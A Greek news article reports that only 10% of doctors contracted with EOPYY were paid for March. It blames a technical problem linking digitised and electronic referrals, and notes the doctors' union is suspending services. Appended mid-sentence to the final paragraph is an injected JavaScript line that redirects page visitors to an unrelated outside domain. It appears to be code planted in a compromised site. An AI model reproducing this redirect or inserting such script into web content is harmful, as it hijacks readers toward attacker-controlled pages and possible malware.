Μόνο το 10% των γιατρών του ΕΟΠΥΥ πληρώθηκαν για τον Μάρτιο

0
9

 

Τεχνικό πρόβλημα ταυτοποίησης και συσχέτισης του ψηφιοποιημένου φυσικού παραπεμπτικού με το ηλεκτρονικό παραπεμπτικό καθυστερεί την πληρωμή πολλών συμβεβλημένων με τον ΕΟΠΥΥ γιατρών.

Με επιστολή της προς τον πρόεδρο του Πανελληνίου Ιατρικού Συλλόγου (ΠΙΣ), Μιχάλη Βλασταράκο, η πρόεδρος της Ένωσης Ιατρών (ΕΝΙ)-ΕΟΠΥΥ, Άννα Μαστοράκου, ενημερώνει πως  «μόνο το 10% των γιατρών έχουν πληρωθεί» για τις υποβολές Μαρτίου.

Η κ. Μαστοράκου χαρακτηρίζει την εικόνα «άκρως απογοητευτική», καθώς παραμένει σε εκκρεμότητα η εκκαθάριση χιλιάδων πράξεων και επισκέψεων, προσθέτοντας ότι η Ένωση Ιατρών ΕΟΠΥΥ έχει καταθέσει εξώδικη διαμαρτυρία γνωστοποίησης επίσχεσης παροχής υπηρεσιών με τον ΕΟΠΥΥ των απλήρωτων γιατρών από σήμερα.

Ειδικότερα, όπως αναφέρει η Ένωση Ιατρών ΕΟΠΥΥ, παραμένει ακόμη σε εκκρεμότητα η εκκαθάριση, 3.200 υποβολών επισκέψεων. Σε 1.700 επισκέψεις, διαπιστώνεται τεχνικό πρόβλημα ταυτοποίησης και συσχέτισης του ψηφιοποιημένου φυσικού παραπεμπτικού με το ηλεκτρονικό παραπεμπτικό στο e-dapy. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here